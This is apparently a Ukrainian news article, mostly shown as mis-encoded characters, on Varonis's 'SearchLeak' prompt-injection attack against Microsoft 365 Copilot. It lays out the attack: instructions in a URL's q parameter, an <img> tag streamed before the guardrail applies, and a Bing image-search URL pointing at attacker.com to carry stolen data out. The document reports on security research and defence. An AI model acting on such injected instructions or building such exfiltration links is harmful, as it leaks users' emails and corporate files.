ÐинÑлого вÑвÑоÑка Microsoft випÑавила вÑазливÑÑÑÑ, ÑÐºÑ Ð¾ÑÑнила Ñк макÑималÑно кÑиÑиÑнÑ, Ñ ÑвоÑй плаÑÑоÑÐ¼Ñ M365 Copilot AI. У понедÑлок доÑлÑдники, ÑÐºÑ Ð²Ð¸Ñвили вÑазливÑÑÑÑ Ñ Ð¿Ð¾Ð²Ñдомили пÑо Ð½ÐµÑ Microsoft, ÑозповÑли, Ñк ÑÑ Ð½Ñй екÑÐ¿Ð»Ð¾Ð¹Ñ Ð´Ð»Ñ Ð¿ÑдÑвеÑÐ´Ð¶ÐµÐ½Ð½Ñ ÐºÐ¾Ð½ÑепÑÑÑ Ð¼Ñг виÑÑгÑваÑи коди двоÑакÑоÑÐ½Ð¾Ñ Ð°Ð²ÑенÑиÑÑкаÑÑÑ (2FA) Ñа ÑнÑÑ ÐºÐ¾Ð½ÑÑденÑÑÐ¹Ð½Ñ Ð´Ð°Ð½Ñ Ð· елекÑÑÐ¾Ð½Ð½Ð¸Ñ Ð»Ð¸ÑÑÑв, доÑÑÑÐ¿Ð½Ð¸Ñ Copilot. Microsoft Ñа ÑнÑÑ Ð¿Ð¾ÑÑаÑалÑники LLM (Ð²ÐµÐ»Ð¸ÐºÐ¸Ñ Ð¼Ð¾Ð²Ð½Ð¸Ñ Ð¼Ð¾Ð´ÐµÐ»ÐµÐ¹) виÑвилиÑÑ Ð½ÐµÐ·Ð´Ð°Ñними запобÑгÑи Ð²Ð¸ÐºÐ¾Ð½Ð°Ð½Ð½Ñ ÑÑ Ð½Ñми пÑодÑкÑами зловмиÑÐ½Ð¸Ñ Ð·Ð°Ð¿Ð¸ÑÑв на ÑозкÑиÑÑÑ Ð´Ð°Ð½Ð¸Ñ .
Читайте также: Google відправила власнику поламаний Galaxy S22 Ultra замість справного Pixel
âÐеÑÑопÑиÑина: ШÐ-боÑи не здаÑÐ½Ñ Ð²ÑдÑÑзниÑи ÑнÑÑÑÑкÑÑÑ, Ð½Ð°Ð´Ð°Ð½Ñ ÐºÐ¾ÑиÑÑÑваÑами, вÑд ÑÐ¸Ñ , Ñо бÑли непомÑÑно впÑÐ¾Ð²Ð°Ð´Ð¶ÐµÐ½Ñ Ð² ÑÑоÑоннÑй конÑенÑ, Ñкий Ð¼Ð¾Ð´ÐµÐ»Ñ Ð¿ÑдÑÑмовÑÑÑÑ, на Ñкий ÑкладаÑÑÑ Ð²ÑдповÑÐ´Ñ Ð°Ð±Ð¾ Ñкий викоÑиÑÑовÑÑÑÑ Ð´Ð»Ñ Ð²Ð¸ÐºÐ¾Ð½Ð°Ð½Ð½Ñ ÑнÑÐ¸Ñ Ð´Ñй вÑд ÑÐ¼ÐµÐ½Ñ ÐºÐ¾ÑиÑÑÑваÑаâ, â пиÑе ArsTechnica.
Ðе маÑÑи можливоÑÑÑ ÑбезпеÑиÑи ÑÑ ÐºÐ»ÑÑÐ¾Ð²Ñ Ð¼ÐµÐ¶Ñ, Microsoft Ñа ÑÑ ÐºÐ¾Ð»ÐµÐ³Ð¸ змÑÑÐµÐ½Ñ Ð·Ð²Ð¾Ð´Ð¸Ñи ÑÐºÐ»Ð°Ð´Ð½Ñ Ñа ÑпеÑÑалÑÐ½Ñ Ð·Ð°Ñ Ð¸ÑÐ½Ñ Ð±Ð°Ñ’ÑÑи (guardrails), ÑозÑÐ¾Ð±Ð»ÐµÐ½Ñ Ð´Ð»Ñ ÑÑÑимÑÐ²Ð°Ð½Ð½Ñ Ð½Ð°ÑлÑдкÑв ÑÑÑÑ Ð½ÐµÐ²Ð¸Ð»ÑÐºÐ¾Ð²Ð½Ð¾Ñ Ð´Ð¾Ð²ÑÑливоÑÑÑ.
ÐеÑеÑÑÑибÑÐ²Ð°Ð½Ð½Ñ ÑеÑез Ð·Ð°Ñ Ð¸ÑÐ½Ñ Ð±Ð°Ñ’ÑÑи
Ðдин Ñз Ð·Ð°Ñ Ð¸ÑÐ½Ð¸Ñ Ð±Ð°Ñ’ÑÑÑв, вбÑÐ´Ð¾Ð²Ð°Ð½Ð¸Ñ Ñ Copilot Ñа бÑлÑÑÑÑÑÑ ÑнÑÐ¸Ñ LLM, не дозволÑÑ Ñм надÑилаÑи вебÑоÑми, елекÑÑÐ¾Ð½Ð½Ñ Ð»Ð¸ÑÑи Ñа виконÑваÑи подÑÐ±Ð½Ñ Ð´ÑÑ, ÑÐºÑ Ð¼Ð¾Ð¶ÑÑÑ Ð±ÑÑи викоÑиÑÑÐ°Ð½Ñ Ð´Ð»Ñ Ð²Ð¸Ð»ÑÑÐµÐ½Ð½Ñ (екÑÑÑлÑÑÑаÑÑÑ) Ð´Ð°Ð½Ð¸Ñ ÐºÐ¾ÑиÑÑÑваÑа. Щоб обÑйÑи Ñе, Ñ Ð°ÐºÐµÑи LLM звеÑнÑлиÑÑ Ð´Ð¾ мови ÑозмÑÑки, Ñка, ÑеÑед ÑнÑого, дозволÑÑ ÐºÐ¾ÑиÑÑÑваÑам додаваÑи до ÑекÑÑÑ ÑÐ°ÐºÑ ÐµÐ»ÐµÐ¼ÐµÐ½Ñи ÑоÑмаÑÑваннÑ, Ñк заголовки, ÑпиÑки Ñа поÑиланнÑ, без Ð½ÐµÐ¾Ð±Ñ ÑдноÑÑÑ Ð²Ð¸ÐºÐ¾ÑиÑÑÐ°Ð½Ð½Ñ HTML-ÑегÑв. ÐнÑий Ð¾Ð±Ñ Ñдний ÑлÑÑ Ð¿Ð¾Ð»ÑÐ³Ð°Ñ Ð² ÑомÑ, Ñоб загоÑнÑÑи конÑÑденÑÑÐ¹Ð½Ñ Ð´Ð°Ð½Ñ Ð²ÑеÑÐµÐ´Ð¸Ð½Ñ HTML-ÑегÑв, ÑÐ°ÐºÐ¸Ñ Ñк <img> Ñа <form>. У бÑдÑ-ÑÐºÐ¾Ð¼Ñ Ð²Ð¸Ð¿Ð°Ð´ÐºÑ Ð²ÐµÐ±Ð·Ð°Ð¿Ð¸Ñ, Ñо вÑдобÑÐ°Ð¶Ð°Ñ ÑÑ Ð´Ð°Ð½Ñ, поÑÑаплÑÑ Ð½Ð° вебÑеÑÐ²ÐµÑ Ð·Ð»Ð¾Ð²Ð¼Ð¸Ñника, де ÑекÑеÑна ÑнÑоÑмаÑÑÑ ÑÑкÑÑÑÑÑÑÑ Ð² жÑÑÐ½Ð°Ð»Ð°Ñ .
âÐдин Ñз Ð·Ð°Ñ Ð¸ÑÐ½Ð¸Ñ Ð±Ð°Ñ’ÑÑÑв Microsoft загоÑÑÐ°Ñ Ð²Ð¸Ñ ÑÐ´Ð½Ñ Ð´Ð°Ð½Ñ Copilot Ñ Ð±Ð»Ð¾ÐºÐ¸ <code>, Ñоб бÑаÑÐ·ÐµÑ ÑпÑиймав ÑÑ Ñк звиÑайний ÑекÑÑ. ÐнÑий â обмежÑÑ ÑайÑи, ÑÐºÑ Copilot дозволено вÑдвÑдÑваÑи без Ñвного дозволÑ. ХоÑа Copilot Ð¼Ð°Ñ Ð·Ð°Ð³Ð°Ð»Ñний дозвÑл на надÑÐ¸Ð»Ð°Ð½Ð½Ñ Ð·Ð°Ð¿Ð¸ÑÑв до доменÑв Microsoft, Ð·Ð°Ñ Ð¸ÑÐ½Ñ Ð±Ð°Ñ’ÑÑи обмежÑÑÑÑ Ð·Ð°Ð¿Ð¸Ñи до ненадÑÐ¹Ð½Ð¸Ñ ÑайÑÑвâ, â поÑÑнÑÑ ArsTechnica.
ÐÑ Ð¾Ñонна ÑÑÑма Varonis ÑозÑобила ланÑÑжок екÑплойÑÑв, Ñкий змÑг пеÑеÑÑÑибнÑÑи ÑÑ Ð·Ð°Ñ Ð¸ÑÐ½Ñ Ð±Ð°Ñ’ÑÑи. ÐеÑÑим елеменÑом бÑло Ñе, Ñо доÑлÑдники називаÑÑÑ “Ðн’ÑкÑÑÑÑ Ð¿Ð°ÑамеÑÑа в пÑдказкє (Parameter-to-Prompt Injection). ÐаÑамеÑÑом Ñ ÑÑÐ¾Ð¼Ñ Ð²Ð¸Ð¿Ð°Ð´ÐºÑ Ñ q в URL-адÑеÑÑ, Ñкий викоÑиÑÑовÑÑÑÑÑÑ Ð´Ð»Ñ Ð¿Ð¾Ð·Ð½Ð°ÑÐµÐ½Ð½Ñ Ð²ÐºÐ»ÑÑеного запиÑÑ. Ðн’ÑкÑÑÑ Ð¿Ð°ÑамеÑÑа в пÑÐ´ÐºÐ°Ð·ÐºÑ Ñ Ð±Ð»Ð¸Ð·Ñким ÑодиÑем Ñн’ÑкÑÑÑ Ð¿Ñдказки. Ð ÑзниÑÑ Ð¿Ð¾Ð»ÑÐ³Ð°Ñ Ð² ÑомÑ, Ñо зловмиÑна команда Ð·Ð½Ð°Ñ Ð¾Ð´Ð¸ÑÑÑÑ Ð² паÑамеÑÑÑ Ð·Ð°Ð¿Ð¸ÑÑ, а не в елекÑÑÐ¾Ð½Ð½Ð¾Ð¼Ñ Ð»Ð¸ÑÑÑ Ñи ÑнÑÐ¾Ð¼Ñ ÑÑагменÑÑ Ð½ÐµÐ½Ð°Ð´Ñйного конÑенÑÑ.
Щоб здÑйÑниÑи Ñн’ÑкÑÑÑ Ð¿Ð°ÑамеÑÑа в пÑдказкÑ, зловмиÑник надÑÐ¸Ð»Ð°Ñ ÑÑÐ»Ñ ÐµÐ»ÐµÐºÑÑонний лиÑÑ, Ñкий мÑÑÑиÑÑ URL-адÑеÑÑ Ð· ÑинÑакÑиÑом [https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=](https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=). Ðоле мÑÑÑиÑÑ ÑнÑÑÑÑкÑÑÑ. Copilot з гоÑовнÑÑÑÑ ÑÑ Ð²Ð¸ÐºÐ¾Ð½Ñвав.
Читайте также: Assassin’s Creed Shadows отримала останнє велике оновлення з фінальною сюжетною главою
“ФÑнкÑÑÑ Ð¿Ð¾ÑÑÐºÑ â Ñе Ñаме Ñе, Ñо поÑÑÑбно зловмиÑникам, оÑкÑлÑки навÑÑÑ Ð· обмеженими можливоÑÑÑми коÑиÑÑÑваÑа з доÑÑÑпом до кÑиÑиÑÐ½Ð¾Ñ ÑнÑоÑмаÑÑÑ ÑÑлком доÑÑаÑнÑо”, â напиÑали доÑлÑдники в понедÑлок. ⠓Щоб виÑÑгÑи данÑ, зловмиÑник ÑÑвоÑÑÑ URL-адÑеÑÑ, Ñка наказÑÑ Copilot “ÐдÑйÑниÑи поÑÑк в елекÑÑÐ¾Ð½Ð½Ð¸Ñ Ð»Ð¸ÑÑÐ°Ñ ÐºÐ¾ÑиÑÑÑваÑа”, виÑÑгнÑÑи заголовок Ñ Ð²Ð±ÑдÑваÑи його в URL-адÑеÑÑ Ð·Ð¾Ð±ÑаженнÑ. ÐеÑÑва нÑÑого не вводиÑÑ. Ðона наÑиÑÐºÐ°Ñ Ð½Ð° поÑиланнÑ, а Copilot ÑобиÑÑ ÑÑе ÑнÑеâ.
ÐазвиÑай мав би ÑпÑаÑÑваÑи Ð·Ð°Ñ Ð¸Ñний бађÑÑ, Ñкий загоÑÑÐ°Ñ Ð²Ð¸Ñ ÑÐ´Ð½Ñ Ð´Ð°Ð½Ñ Ð² блоки <code>. Ðле доÑлÑдники виÑвили, Ñо Ð·Ð°Ñ Ð¸ÑÑ Ð°ÐºÑивÑÑÑÑÑÑ Ð»Ð¸Ñе пÑÑÐ»Ñ Ñази “обдÑмÑваннє (thinking). Ðо ÑÑого моменÑÑ Copilot генеÑÑвав ÑÐ²Ð¾Ñ Ð²ÑдповÑдÑ, викоÑиÑÑовÑÑÑи необÑоблений HTML, Ñкий ÑимÑаÑово ÑендеÑиÑÑÑÑ Ð² DOM бÑаÑзеÑа.
ÐÑже, поÑлÑдовнÑÑÑÑ Ð²Ð¸Ð³Ð»ÑÐ´Ð°Ñ Ñак:
- Copilot поÑÐ¸Ð½Ð°Ñ Ð¿Ð¾ÑÐ¾ÐºÐ¾Ð²Ñ Ð¿ÐµÑедаÑÑ ÑвоÑÑ Ð²ÑдповÑдÑ, Ñка вклÑÑÐ°Ñ Ñег <img>
- ÐÑаÑÐ·ÐµÑ Ð±Ð°ÑиÑÑ <img>, ÑендеÑиÑÑ Ð¹Ð¾Ð³Ð¾ Ñ Ð²ÑдпÑавлÑÑ HTTP-Ð·Ð°Ð¿Ð¸Ñ Ð´Ð¾ URL-адÑеÑи джеÑела
- Copilot завеÑÑÑÑ Ð³ÐµÐ½ÐµÑаÑÑÑ. ÐÐ°Ñ Ð¸Ñний бађÑÑ Ð·Ð°Ð³Ð¾ÑÑÐ°Ñ Ð²Ñе в <code>
- ÐанадÑо пÑзно! ÐÐ°Ð¿Ð¸Ñ Ñже вÑдпÑавлено.
Ð¢ÐµÐ¿ÐµÑ Ð´Ð¾ÑлÑдники мали Ð·Ð°Ð¿Ð¸Ñ Ð½Ð° зобÑаженнÑ, Ñкий вÑдпÑавлÑвÑÑ Ð· бÑаÑзеÑа ÑÑлÑ. ÐÑоблема, Ñк зазнаÑалоÑÑ ÑанÑÑе, полÑгала в ÑомÑ, Ñо Copilot не надÑÐ¸Ð»Ð°Ñ Ð·Ð°Ð¿Ð¸Ñи на зобÑÐ°Ð¶ÐµÐ½Ð½Ñ Ð´Ð¾ бÑлÑÑоÑÑÑ Ð²ÐµÐ±ÑайÑÑв. Щоб подолаÑи Ñей бађÑÑ, ланÑÑжок екÑплойÑÑв викоÑиÑÑав поÑÑÐºÐ¾Ð²Ñ ÑиÑÑÐµÐ¼Ñ Microsoft Bing Ñк ÑвоÑÑÑдний ÑÑамплÑн. ÐгÑдно з полÑÑÐ¸ÐºÐ¾Ñ Ð±ÐµÐ·Ð¿ÐµÐºÐ¸ конÑенÑÑ Copilot, Bing належиÑÑ Ð´Ð¾ ÑайÑÑв, Ñким дозволено надÑилаÑи ÑÐ°ÐºÑ Ð·Ð°Ð¿Ð¸Ñи. ÐÑÑÐ»Ñ ÑÑого Bing надÑилав Ð·Ð°Ð¿Ð¸Ñ Ð½Ð° конÑÑолÑований зловмиÑником домен, Ñкий бÑв вклÑÑений до запиÑÑ. ÐÐ°Ð¿Ð¸Ñ Ð²Ð¸Ð³Ð»Ñдав пÑиблизно Ñак:
[https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png](https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png)
ÐомпанÑÑ Varonis назвала ÑÑ Ð°ÑÐ°ÐºÑ SearchLeak.
“ÐÑкÑлÑки SearchLeak наÑÑлений на коÑпоÑаÑивний ÑÑÐ²ÐµÐ½Ñ (Enterprise tier) Microsoft, ÑадÑÑÑ ÑÑÐ°Ð¶ÐµÐ½Ð½Ñ Ð½Ðµ обмежÑÑÑÑÑÑ Ð¾ÑобиÑÑими даними â вÑн здаÑний виÑÑгнÑÑи на повеÑÑ Ð½Ñ Ð±ÑдÑ-Ñо, до Ñого коÑиÑÑÑÐ²Ð°Ñ Ð¼Ð°Ñ Ð´Ð¾ÑÑÑп вÑеÑÐµÐ´Ð¸Ð½Ñ Ð¾ÑганÑзаÑÑÑ, вклÑÑно з елекÑÑонними лиÑÑами, запÑоÑеннÑми на зÑÑÑÑÑÑÑ Ñа ноÑаÑками”, â напиÑали доÑлÑдники компанÑÑ. â “ÐокÑменÑи SharePoint, Ñайли OneDrive Ñа ÑнÑий пÑоÑндекÑований бÑзнеÑ-конÑенÑ. Ðалежно вÑд Ñого, Ñк M365 пÑдклÑÑено до ÑеÑедовиÑа, ÑадÑÑÑ ÑÑÐ°Ð¶ÐµÐ½Ð½Ñ Ð¼Ð¾Ð¶Ðµ ÑозÑиÑиÑиÑÑ Ñе бÑлÑÑе”.
Як зазнаÑалоÑÑ, Ñ Ð²ÑвÑоÑок Microsoft випÑавила вÑазливоÑÑÑ, ÑÐºÑ Ð²Ð¸ÐºÐ¾ÑиÑÑовÑвав SearchLeak. Ðднак, оÑкÑлÑки Ð½ÐµÐ¼Ð°Ñ Ð²Ñдомого ÑпоÑÐ¾Ð±Ñ ÑÑÑнÑÑи пеÑÑопÑиÑÐ¸Ð½Ñ Ð¿Ð¾Ð´ÑÐ±Ð½Ð¸Ñ Ð¿ÑовалÑв, зловмиÑники неминÑÑе знайдÑÑÑ Ð½Ð¾Ð²Ñ ÑпоÑоби обÑйÑи Ñойно збÑÐ´Ð¾Ð²Ð°Ð½Ñ Ð·Ð°Ñ Ð¸ÑÐ½Ñ Ð±Ð°Ñ’ÑÑи, Ñ Ð¿ÑоÑÐµÑ Ð¿Ð¾Ð²ÑоÑиÑÑÑÑ Ð·Ð½Ð¾Ð²Ñ Ñ Ð·Ð½Ð¾Ð²Ñ.
Читайте также: Прогноз матчів 19-20 червня ЧС-2026: США, Бразилія, Туреччина і Марокко
ÐжеÑело: ArsTechnica